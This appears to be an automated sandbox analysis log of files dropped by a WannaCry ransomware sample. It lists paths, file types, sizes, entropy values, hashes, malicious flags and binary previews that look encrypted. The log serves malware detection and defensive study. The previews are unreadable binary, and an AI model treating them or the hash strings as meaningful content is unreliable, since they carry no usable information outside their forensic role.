                                                                                      Preview:'n...bG.}~....B....._.I.[...x|.1)%.....~..\."va....=.p.JPd...p...S9......<.Gr....f...o......E.6.h1...s@.8..xw..@................+...s.jA...zE.p..U@kxS.Q....>.7..,....+Y.78Q.@.1./N:....:. .m.f0.+.s.....&.c..N..3R.k..|g....x6]LsW...O..8*...[.9.D.$........h......{.'b(..Q@:n..UI..V...zA/....!:*..-...Ec...-..G..z..-.U...=.^8i.....T.P`%....|g.5..S...k...dn'.'.|D+=J..B....l..H.A2.;lh.....;..W.N8..?...+....Z.\.F. .4.u.hL...1C!@%......9....(.Z.qiR._..R...=.9.r...D.dAH.:..#?Q9D.6OY.$.Z..x=......z........;..o.....K..nh..|8z.ql.{@Ryy.......7.+..G..X..1|..qul9Fz..^H.m.Uw.....9*rY....Q..#.,v2......#.d@X..v.....>`I.e.........M...i!.....{&~>*.....U#..Q...t...+H.{..B...., .c..j.ZapDt.......K..o..y.m....1...h....=.l../..9.}.9r....+..R6.E.2.n...Z.6...<..c.F.<...R0T.L.K. .z.X.....b...%...!/..Z....!.Xc<..V.b..V....0.Q......s.a..J-.X.'...R...V...V.~[..]H."9.u.tB/.2......pC.....].UV.\....8..._..../....:.H....f. ...A3.M.P....R3q......;;.....)G$.;&..:L.g....f$.X
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.783992611540989
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XCng9kw+2a9JKF6DzcAyd4JPyzStTx0fjTnzTWhMC2:+Q29JbA3MPMSonzToMC2
                                                                                      MD5:B1B7E3A23C5306D30FAAF0DA353D01B0
                                                                                      SHA1:A1FD8B82A303DF8F4B4837791737BC39B08C269F
                                                                                      SHA-256:173D7256A9F466B918A6345150E603BA2D42E981F7365C985532D6A0D0E6A9E5
                                                                                      SHA-512:15FFB1383FAB960256C4E4722137E206571A7ECBAD5754CD76BBB34223660048040AE6C0A19342A59E77DB03A020E7D490E3D8B7E860F9D702BF7C0121A1731C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:+.~f|.@..".>3...$...7.,A...y:...C=....~....4..pz.cm0pG..bK....O!.p.*..uq.n.w..._.ss..gW.IE...^...t]L.....f.....`$.C..=6[...x8..{.K."....q.C....b6-.1.\...........]...hmm.j%....^...(....#......A..xk..EP.....l\.HK...sv.I!......<..V..2.!...V.2...!.u......U.).4tY..V .B!..V.u7...ev9.....v......5..(.F..7..zB"..U..%HfS.z.l;0..e.w.].m..;u......D.w.^%6.$B&q.s...{../..^H..r.......r...|.......Ga..;.J..l..AX)7.5wES.!q.7.......!.....<.`.U...N.(g.hy....(._.{j)=..iu...Z....J\_..d.T.\.3..SL...(vS...v....&#....g.y..s..#..._.p.V.0.1.....hI.g......{^.$2..3.....3$8.qn.Q...;Jn.nu...!. x.....a..73..@../`:.....z....f..e......1......u.3.2.R.Rd!.....\.1mv.\[...>..!.y..9B.X..^..>{..*..iU.G2..sJ..Z...7\.l+...`...P.n..S.S6.....gsN.......MV(..8..g.cf?./.d.d.......NVV.t..K-E{.........v.Z....s$........R*.V....O..`...>y.+!..4.+.......?.a...0X.K`...Z.8&.H.........^.W.@..(T%IIh.0."E.].V.1....G....,...ry..wi.(N......h....t..JZ.z[..:...0.?..D.....3...E..O..|..V.S..............
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.832957597413935
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:o2Sichhtj+8PmJWWELbEM74aI9MEYS5EUhRQA:obhT+skELbZxI9MR2E/A
                                                                                      MD5:DF05A73B7D8CB7904FBC4275FEDD4C9B
                                                                                      SHA1:C315136656E5FB68F8AE6BA31BC3D79F5FD32FB0
                                                                                      SHA-256:D61140EEEFC1AB891ABDF920C09E8E0D1ED9E28B71AB65C87827E08212878F82
                                                                                      SHA-512:5A4720467D06E67932D619756D8AD695372CFED35B9233F63794AB0299591EB520000B0496A6E4AD5CF5C02D0182A7E01534454BB9D7EDC9BA677C30C42EB624
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:/.\4...@1.38.Y].....O......p.g._.B}...7.X....0.G..W.|.MT.E.Ep>T9..t/.Z0...V1............a....W.l.o~.BH..C9..3.o`N_K|..7.%a......8...S..yM.....)..w.CC[..,&%<......%.V@'...7.P.N.|....,5M]r...."...V.*....~.T..m..=.<..n_....W..\.u.AR.2Yw.\N..o.(.'0(.`...{..s.F...#..s.W>U..7...$...d...........bW..<..m.5.q..|%1.}.}...M@D.>...2Yq.a[..3i{.I|.@.L8P..=..Ux..5#BR..H...U......{.r...O]Q.[.<n.K.>....Z..?...N.;..</....t....@.}....e..$A.....2.E.....R.-*..j.7:I.....\:Ow.5..s.GoLP3..c...w.*.C...._y..D...H. $.*'U#\._.s0....W.V.....h.Ype.U.........5...1.kW:..u..w.G*.[..U.$.Q....p..+.1.p...YYQ.......k .k.G.......z.:..t..P......YMH..*..!u6.k..U.3.8..k.B"....\<......E...E..U.*b..J}]h..B4r..TL..._.....).jQ..3).....&....)`.l.].. ..S.m.z.z...Y,,@.B4K._k.y.{....Q......<|.......i4....K]..m*.0..C.>...Xh.vG.....',].k....w..^.xj?Z1.....g,...y.......zP.f.E?KQ..y.3..|~...2.... i..SfZ!T.C1#.....D.T[...38.....d......$R.{.C......A.......nd....P.B.<.6.s9.lW.....LY.).~....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.820456288895583
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:eShOiIAot7BKXrHQvPWn+1LUBHQE7UuR/LzQDX47J3/fdDM6rZR/N6vMMHdG0cAP:TORnKXEvPWcm0XG3/fhM64tHdJZuee4n
                                                                                      MD5:14986A111298E7E0D491024325E8EFB7
                                                                                      SHA1:944803F6AA4CBCA10507602CB15CB131110A438E
                                                                                      SHA-256:934243E44D83695D6D2ECCCC4981442FAC9C6ECE18E58FEAA11DE41717D5066F
                                                                                      SHA-512:48D566D4C0C99DB11BB568C2EE04D6B97C2DA69BA4FF7A0E86ECF6C70D5F7E79BCE6126D5B70123503F15F3DDD25948948F76AA60E220A1ED5817B467F6F0512
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:=...e...y..'r[\k.!~..J).<...M.oAv1...^.V.9...m@F..&.<.d.-.7....+...n.80....O{.Y.zw....1!..t..|..AU......u..h.A.t$.]6Tp....0w.GPz...H..j|....-.....|....SK0...![.`..yF...c..... g...ee.o..m.."n..N..cA..y......F.2.fq..7NY'........!.?...~.kN^.O.`. .Ey]........Nx..>..e.........Kb.S...+....4...Exi..z-4.$5wp...si0.(<.....n.%...=.R..5.R..~)....=..>.I.;.9..n....\>Y ...e.T+h....2.q.q.i+././:p.= 3.S/.m..=.........!...&.Mv......&...5T<.|.z.........J.m.*......N.1.........(...SA.!}^e...u.n]5..07..YA...W........E.V..H...]*;pbt.F......k.yo....<....'..0..$*9i.R....!>n..Bs..}Q.3$/.q.J..y.(.].~.R...._.<S.xAj..pz..:q.K.[.....4Q{.AP;-..{m\.F>)9+.Uf.D.E.7.7.#......|...P?(..Y...'..._:.....j..z.......S2=.;..:..g.K.|e..p.H.~.i.W..!.(.4=.>...Av.....u.yy.Z.;..G.$.,.0p`.FLV..M.......... 8f........(4.....[.z1,].....?..V.|..Q..^..H...L.l...a.........['..m.1.....*.........}0..B.NF..W....*...44D+..IP.....y..c.EA$.s......W;....[........C...\P#V.... .s'.QO..W...@.p[....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.790629141189544
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:cRcmUud/5jAeD/OJwGwbgBHkRp0m6g5NXnSDDUC5uhxue:cRcmxdhcJGbg0B6grncDUCGp
                                                                                      MD5:35C7815105007363AE64A134D832F4F3
                                                                                      SHA1:0CEC8B49A65CC24953B59418518019BD7845EC1E
                                                                                      SHA-256:7B915768BA1BC5ED3DC89C8A5F071AD5FC347AB1553F7FEC6D5565384932F5CD
                                                                                      SHA-512:5AFAD3542E951FF70C8F7F403F5005A84A11DA2C923C2B3021D0534384307DCF3037266A4333C1B3077F9BF59F630FBDF023A92D7CD5BF87227F29C99502B49B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:E.?...-..\m...?;........Q..0..R...}.......3.~.Lx....R..B,V.d.zyP...E...c.}.l|...[>.F...ya.E...=..(..@o.(;......S{.%'......6<#L.I..q.S.=..*..Th..5....i...`.Z.&..@k.R.)..2"}...fUm..J.;...u........>_.qaX.E.1.{...../....|.....2$u.?..-...ZM....U...g.+...T..g.'.vGqU...$...,[.......W.b..r8.....G....`uWQ..{.".`.n...F.......:.....z....'...%bE-#E.-i.&;.\~K1......Ae..!I..xE.^.z.B.[I"..Qs{.|.p...)..b+...w..<5....@..$...|.qLw.(..s...|b.W8..b.S..P.....Y.k+...+.E...s. .....No.....L...9...MV..._V..T0...d..C=..]..L|.V...NuHZ.....}.P..;.....F=...'.e(.i...y.S3.b.(...\..+..(D....Y.rX...[....(.....^x=..X.....M.ti.x..d..p.V.k.QU.."M3.....I.[.T.....e"."6..=.C.....!e..i.[....\.J\.../r.f..G..\TZ.5..S..:.T.zZ.%a.pP.......f.B.m..-....{C....\...'.C..r..H.R^u..].L.U....>...T....j.6.......R....y-....Y$.T....k......`.|g.o/...1...@\.A..j..,SMC(...Q.6H..<.m^ .,o<...D...W..Jv.k.X{E9.....p;.a..!.P..@L. ..)5D1.....~A..';N....\.B.....2.bJ..Rd.'.."w.[4X....T"..L.]/.=~f....b
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):271360
                                                                                      Entropy (8bit):7.99923285382296
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:JCPCp9ktJyz4UtNe0u664n4imdvjyGCUMn4cqRVEzo:vpwJyzh7nUvjyGCUMla5
                                                                                      MD5:4F0FC4096CE7C4BB31499CA8B304DDEE
                                                                                      SHA1:5F176A1B7F593736F6616DE55277E38658F86A11
                                                                                      SHA-256:800636D080D6809513EF2FA160FC673218ED6EF8FEFADFFC108B77B3DC69C149
                                                                                      SHA-512:E9AAA38455A12FAC0C516AA9F4DC4BD835A8319547B7B52CA5A80F026688CD720DFFED4CD443E2DD43A77D4E9F77D5016DB6CD6F9060D76741BE8969F874ACA1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:../A..6s.K...~~%.E+=.HF.r...dlmVs........c..n...6..........7.u.5..%.d..?..?.!....z"2..Lf4~+....a.(..M......."*x.g.{..jy:.4...]>..+q.y..q&#.p.@..#..>..52cSX.MK....x...3.$.......:h..k..........LP..[F..E....s.....dr....9.G.0.|.A..b(...g...{y......1......r....x..(....U..Q.p;.fP.)m.V..X`{...... .b.nL..........IH.HG1)...-/.~.....!.!q..J.....G.u.v*R.#..A...m*G{........r...............<...g.).(.q.7..1B0|.0.h..=n..J...C..h.l..sldF1s...n+.\.m..bB.E...9./i...........9.@..(#..<.6....'..%...._.V..(jC..q-..r..z.N.<K.l..T.......V..$7.?...r.?c...O....1......,-.vU:..Q@.....|......i..A..n)./[...a...H.w..f..t8Z..6A...D^..yn...x.e.a..6.;8c@..K...0.NR@"T..}...#.y.LSj)..||...c.b.w\S.....<2x...._.z.3..l./...G.sK./2.L.+.w.4F...Te..}.C..K.....H...c.m."C?......a.CAM...".z...WhMN.N....9..+..Dg.R.m.."....E(x..-...-...y...g..q..kg......).W7..s..@..g.....W..#9...Q...!h.m.l^.+......m=..8.+o,8/...UV.u.....dk.gi.B:....)..hT.,.2@y.B......=l.?..<..5.T.....q+3..M...P.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.822553456193062
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:d85k/BAFa2b9bQv5rzgVcCQXQEcoa6pCPp0pTTVETiv6bt:d8TFfFmNgV3QXQEcR6op0Drv4
                                                                                      MD5:0F6A37D159AE9E57EA74B7016A533897
                                                                                      SHA1:ED3CDBA8CD74268F81CF8BD611ADE17843623EC6
                                                                                      SHA-256:D93E5386DEBCD84DDEA500E244EF1EB9A11DC5811E888653106A3475D62E2634
                                                                                      SHA-512:CBA866B9864EB24DC1C3CBF7D5C58ED63559752C543FDB9E8FF84719924B34F55C6BBB9513D90DE0522D534D84DC2432C8BE9C33F4F6D1D3123AFF1539674242
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.......A........+.n..'.fP........."..E...h...._AK6...)...R..;.......=..[M..56K....d......67.X."K....G;sw.a...%r...!.q..i.1...%.....N.......eE+.(.w.........8,.....M...t.1.uU..{.*..z.H`P...._.P~..H.<S.....(5.K....q2..9.|.Z..0.wO}r@.c.{..-.R..+S...f~(..H.F..d..sK.xi<.y.......?........%J=X.7...<..[F.D.Y@V.ar.@.lI...E4.c.r."....OL.ld....J.)U..z.8.9...q...d..S......=.`..A...0.X!.. f.V....#.$...XH.;~e#....%.....g.#....9....v....T<..o?T.Y"24Vw.....b.1....T.....*0......,.WW...D..N].....6.b....L.,....f.]S....\.m.z.....t.....04H..~.....k..N+..;.spf.!......1l*.........~..`q.....>.0f..b..[..j`..Ei.m.Fb.(b..Ea..v..^Qb...oP.{...."X2%.@.&^.......9j.w<..K...Tx..........D.T..3..y.dS..a..<.....A...n..b..+...1..]..oxY7..5..-j.....K-.H..........t.......uj4.SW....+Yn.wDcr8...j....-x.&....&.......J?.zW.\q..Hb.....7.k.=7......p.s.t.......~.p.....`.)b1(..j.@..o.|9e."..d....m8.....D.&_N.....4.d-=N.I.).@OZ.L...!.....]?9r..4^.R|.....y...Q.7.?...!.v.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8018764279540385
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:L9Vk8c7S4LqA+4mOvHjQj3+bBoH1F9M1awijsQcISzIb0Q7qE:L9Vk81wq8vMj3g2/Ml6sQc3z1Q2E
                                                                                      MD5:10E6F77360277A7AEE975FBB73D0A52E
                                                                                      SHA1:2C4EC530766380675E7999EB94473EAA996267B0
                                                                                      SHA-256:C52382001157ACB847CA0FFA82D3682AC2AB9A7B5A0AFEC83FFA159F1A422D18
                                                                                      SHA-512:EBA7DE0CF9DF18188751D47C61F76D3E467AB2C5DC0F3B05CA0311AE3D398CFBF2AD9D8DE2BF52FA95279B70BE5D02294780BF9099A887CDFB775C0A004EAD84
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.....=.....Q.l#p0...... ?.....u.~5.X.#...V.&9..U...N.a..Q.E...C...8...I.. ...............K!..AV..."_.p.....K....(.s....|EW....+E..Z-V_c..18"....L...y.va...*.6....;...^..}..7h.\..z......q. .......{F.c.?U...8R.c`.K....S..........R{4n........9Z..0.0Y.=.......(..J4.B..ao..F.9N.......^.. .b}&....H7..$.5,gK*..!T9S....D.....Z?...kN.7.f..y..k.X..x.T..p..l..._[..x.IO.uG<E(...L...z.'.....4e.7./..Ux>..qk]...(7W..Q...J.2.a..]].e.4*....K..Gm ..-..MA2..+.G.q]..{.@..$C.5...Q......<>......9y."w.n!..m..}l...i.s..6*u...]0/S.[.@ `....U8..MB.b....d.(.4...N.....7/..v..^N...H0.......$.....`..sq&....l....4J..L.........7Wv.....9..Gy[=.NOH..Gx%;k.............z...cc.bh-.....x.mX.D..+<J.A.G%......\........m.T.AF.y.f.....c.y>.@".+>.. ....el(|....<k.@....t....#..k..+.:P.....>..|.T.q0.....0..D{_G<......0y..j..0._.~...W./.N.D.X....v..*.....K....A..C._6Y....p..JIG.....rP.M....o......TD..N=.....5.q..r..+...C...z..<..K.....m..M.We..._o...?%....dw.g..4.l..iU.|9..e.HM.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814491710523414
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:dezy/nMMHhGF/XmOpZI+blWJj4xyidEUOuF:TMMHhGJXmUI+bu2dEUx
                                                                                      MD5:38D173420C8FD7560EA497A2C55F0BBC
                                                                                      SHA1:1784B83FE2B864CB189BABD3DBC24B43F327E95E
                                                                                      SHA-256:F8142C2FD3B2D905FAE14EFE99BAACAB34E6781746074A412B6BC96A4D97E255
                                                                                      SHA-512:E67573384FDF44A6B74F9167FC3DCBC2E6606B200707B69BAFB19711FFAA8FA05F7E0EDB27DF2CA81F329C10058EAD892A70C036259C6ACCE082A20313E4CF8E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:%Tb8.._.W...K.6\sH...$z.ScHt.J!Z2G8..|}.lh*H..r...)5.<.^G.(..^...Sh..[2.'s..7.9S..._....x.9.pYhAEq..Rx...<.U(.c....NX...^h.....-....uT.W.....x..]..v....2L...U..........y.o....e<.....f8.D@....>..V.z=.h.B..Gz.m.....$.R.}..D.z...K..6.Y(O..{..6...|4T%..N.5.q......3d.|.L.(.@.O.k.....'...>...4.7..Z...X.$..!_'U....)c.c..........G..#u.....I...:........x.Np......2~.O{76LZ..r.nK.)i...=.A.1.p.<...-..uBL..cB..........6..|..x...F....<.)X...?h..$...4wf.,...v.U.#.1.9...K.6...i..k]p....O(.ce<.N.`<.ch...]/A.6..d.w..&\. 8...>.... *...... ...2\@..?.*..j.Ey.R.w&b...@..V.5....2..O{....U...q..o..P_.O%......G.rD..hvL.].....xi... ..{........7D..O.tTl}/......j&.Y\.#)2`kD.'...T.U..5|a.0.!Y...J].].K.....b.........=&..6.E.....SMw.!&.K......U Z..jJ..5._*ks$..-..c...}(.h#Hx;.mAc.|t..<.j.5...ztt.(.].3.!.46..]...|..:..F..Hai/n\%.5..q.!....D?N"k.(...m.w%...]i|.x..)S.f....P....7n.%.OV..9..k;..~.$.y................j2..T\l....d.c#.NM8q....?....zx..'..:..\...9....+..r.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814382557676719
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:pZMe3PEMfhT9ZameOeQYfqcI4avOXzAxv6K4YXFl9MWXfV:XMMPxZZ9ePfqFvXd6PYXf9MWPV
                                                                                      MD5:AFC7EBD0933FFB6FEB34E569E699B853
                                                                                      SHA1:8FD4CA4CAF6F0F7DD7344A1C188CF6A7B6AFB1D6
                                                                                      SHA-256:415AD2BA2BA299BE13836FB56D6B04FF5869497C4F40F85E66E1BA5ADED8E748
                                                                                      SHA-512:F88576450911AC47483C15A093A84A6D9446AA43ADF079DD7F99BA0B43208A4A328CEC29B27EB974A480534A01DF820B86F35EA132A1A6336824039253199D1C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......|H.v..t..a.5t..LB.v.s.J.FcB.h.t.v..H.o.a....>.*Y.)....".i@.PK.M.."......5.C.&3.w.Q..4.Q...$.}.B>,.......61....}5...w.r7..G...V*h.>1........?.B..h..0......w.^...K....2..H....U.?...g....$B...Ph...~9.A..~V;...I..MTy....Z...hJ..x.Z..Q4.... .........Q.oW.8.y..0.vdeY.=.#...?v..Jei..,...R......_....H^r'..:...|...N.....8-v...8......`...."KvLB..Y...4.|.(...sQ..-..!.e.4..Cl.p-;Q_++...p.WQ{{L.d.g../$w.b. ....p."n.\Oc..nY.....W.G..<i"...S.F....M.Y.#3Gi..@...+...x./s.Gd.<.P....L.Nm....q...h,.Gb....t<./)|.>..A{f....P.ty.a....9..7)..... y{...Y.4G<Qi.....6\U.tS......1%..8.l..\j.E..p.%...../.-.g*.P.M........J.4.yE.......in...pI.K.U.!4..?^<..X9..UU.&.S$`.n<.L.Y|....~.4a..gf.....W...l(..gf..u.l%.........I...G.\.9...2..BZ.'....6....3.......q.g../G.......Np.{..dBW}m.x(GH`N..D..1.'...L.#}.h.8?..+`...F.H#IZ.>..M.......`~."..........=...b.d|...|.. |.6....h9&...Z..k:......N.......b'..'m"@2o.dR...[x..E.Q./.x=...w........x]W~1..l.W$....#^......7 2.M...P5VFh!P.0
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:COM executable for DOS
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804368499083209
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:eHQ+6sB55IVAWQS8BJDvcgZpkgOAcfwhNL:ew3sOAWQSEJDvcTjAcfYNL
                                                                                      MD5:1D6895FD5F410D627496C9FDB2EF264F
                                                                                      SHA1:3AFC91BD33DBE679440B8F26D77CBC7E040FD262
                                                                                      SHA-256:B72ACE55898E9547CCFC69551DC5C06485DFE2398DA87A22AA3320A4623E5966
                                                                                      SHA-512:90D948AB484C588DA59E253FCCB0F453CA83D10ACC06FFF84C42CC60B2063634271D564E97202D435A37978F759BD24E6EAB3931DFA33070FBDA1B46E9508BC0
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:.T.hb.M_..U...O'.c:.k|>..|.$.....L....NQ..X...:......,E[.D~.$.I*k..S..$g@pn...5M..vmv..$*.....ef..vI....@A>....S...5.._.{YY..g.m}..7..C.g$1....=..t..c.;Q.#.7.7`NR..6....0J.%.`.]..X.Hl.p..A#...=.&=i..3:.&3.0D.h.....U..h@_.ik..!..k...Y.c`..M..H./d..6.Y..(..x.ZD..&.#.Bb&6.....%r....k......j...<....O%d0.<....{..AF.oa...).|.<......u...........'..?.1.....4.W..06J(.....ZI.^.l.Z.j.y.Rh..mx<..P...".....?7.\......l...<s.J..L..c....o...........H.K..I..<N.].R.w15.7)j.d......4.I\?.3.._.*.....L.N_X.....u.,.....K_..I..#....*..B...E...KL4)u......J5...........kZ..Y~..Rr..n%..=... ,......j..Dq.|..1.2f..B...IPo....u.bO...{.V.^...I,.,k=R.]..C...h.>.}.G......I1.>.}.....B."..o.-.'m.i....@P.gB.".\f...'.....Y.t...}.w.W^.m.;.o.C..G.. I#....Q.:..%.[...uE.8...1......'.bD._..o...}........Wo..:T...|)w.X.7@q...(B_"..g.....r'|`.......x....d....x..........!....n3g..j`.4z.$#....L.].d:Gp..^X.p.ds.R.4..S.A.....1.B.!b...gc...$0.?..4Gj*.V.p...e......h.?.!r:g.gH.+..Kj
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.805783785313747
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Kfu0ANbRb6VHyA+B/AmdDpjUQMfiqUITq1Wl5UyD1r9S:KqIHyAnmhpjSNUITqsHzD1r9S
                                                                                      MD5:162D27246FA4671D4ECF44D17AA17E60
                                                                                      SHA1:249845CEC8E4E66B23AC1BF01D87C8D72710E660
                                                                                      SHA-256:887125E222022999DCD2B526C3DA8ABA900B38A1686899406A706E647C423D39
                                                                                      SHA-512:0AAC4542494161D25BE3E681F3A6DDCC02E13EA7671D5C867321E0CE34D9B4E83A4B9ACAD3549869593C3F7DE1ECC41B00A2B12EBB4E94FA95BF0F0AC9E866F8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:j.L. ..yj.p....:]N..B.H...E'I..U....Jb3.C.-.R.J.S.......Q.p&WA.....0....Y..[..~..~NJD...d...U...S..U..(+.<..S.l^7.'.....T...K....f.....@(.!......0.D...e.t.F.nBL..N.k.....)...QEP.G..Ef.2........6.e%?.....H...].O1.....g\..Qr.........X^...Z...r[;...>....I?O..c..["....$p..~"..QH......8...\.@.B$...S.^......\.."=F.x.~<..h. ...1..G.M.....Y.Q.b.e.$D.a.dbO_.....V..X47.U%hr4]...-.....o.,.?..H..Oj....3.r.....+-.D...-.-..[5E...*.1...BR.j0{_.Dz^.{M.....H..U.b..k...0Tu...0..g..q.!.jNt..e....>.Q.H.A.2...|8.;.=.uVQ.Z..I..e.G.....ul.....|..5p.!.=.{.&.D.....~M..L...(._...3.X..R.}.G.0...../C.......u..I.{+x.=..V.jR-...".].M/`.z../.%....A........If...y.......^B..h.f..K.....1%"ZrB.d#QnP.E.3tL...1.x?r.W..4..B....en...}.>.S..q.....g..o..C;I.......V..y3..G.zZ..x..O.z!B.....UWF.y....<..6..i[.Y...........W..a.A.AV.Rx.09.;.4=...@(a,".@g.^..s..9u.....o.-G.ijH#C{..z.=..&)..PQ.O.Z....i............89....r......RE|......e.G~.Y....9.H.o.*n.i^......B.....,m..l....z..Y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.788288142837305
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yqnbpa94346Roe3iepgsUJCY2CTNPPeZztjtUKH5mW:Ymc4/Ro8i8gtTBEtBUooW
                                                                                      MD5:8009B7B1DA4836F2190EFF6385A7B907
                                                                                      SHA1:5885AF82AAB423750EA36315D8A1B17D1DDEB3DE
                                                                                      SHA-256:8B8CBD69F0AA9884966D75550A6AEBEA688E09C776762356654F295C16DC8316
                                                                                      SHA-512:987432C8BEF43DA2051E2412023C89F96377FBBF764C60EE10313A017715C3C1086D50C00E91E7E133F5EC71EF049D1ED8289FB4146AC7E71A5320D5A98E5C3C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...0F..v]/..K....#....W.[?.\..k@?..Bj+.!.?........3c.....9...o..O....$.@.......5.D*1.....Wf.!...$...g.9).C..d.Dz.....i.&..U3X..t5.#..l.....r$<.........vO.F$.")..;dR.9\`..].{.........!x.9a..9.x.(...}......\y...4iGQw.?...m...4.myd...O.......A..8N.v..j.u;....L.....%V..\OW.h.zY...._..{".R..P8.....'..l.jD..`.^I...6...i-..$.u@.Lh.@.N..D&...d.....SlA...!e.&.h...Y.O..8`..NY^...r..3.o...J...d.\.VCpqn....6...I02.khf.\.D[..=ia/...>......p.3.T...F/]>...y.9![...C...}F...=.p.....l......WJ.>...?....D...x.Y..^5.....V........f..09zK..T....W._..j.T..L...QC...>!qA.v..@.......A.A.I..u_u.:oW..L...k....E..xA...*p..w..q(..V.`.:...C1c..5V.>....4..b...D.e..pz.=Q......(..J..OuO..g..z.{.R......{...W..?....O...D...'..p.u..\p.RD/..@...Oo..._oYg...=*....z-^......C$...Jz+$.N.....K...l....y.......E.B..tm...X!.J%.L.3<B.I.#dy.........C.75.5.<...k.F.$^.34V..G3..U...D.RK......a.c.$....IZ..x......[.B..c.{.q../1.....+..........7 ..R`..On......,`..........dBP..Vyr[......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814087236401316
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:o8MsPZVGD8bP4P2IR1IldB+jfjL1/25iBiObn9ooVJuNI6Um:o8MsPGDu4PPjedsff1/25i8Or9DuNI63
                                                                                      MD5:C99C62384FA540B0A50212B4C1BCC583
                                                                                      SHA1:ED4BE905009EA98B2D43164737398B38964454B9
                                                                                      SHA-256:6DA14212DCB5C5BDDA53B680029BA26E66600988103AA2501289BC36F6030F29
                                                                                      SHA-512:D2BB9A85F83060BDC634298F5C9FBF16473F9E848736A0EF54D90D6142D6F49950AA33D2181B62FF732AABB9746900D7C255A70041987696A008EDD96C0B5FEC
                                                                                      Malicious:false
                                                                                      Reputation:low
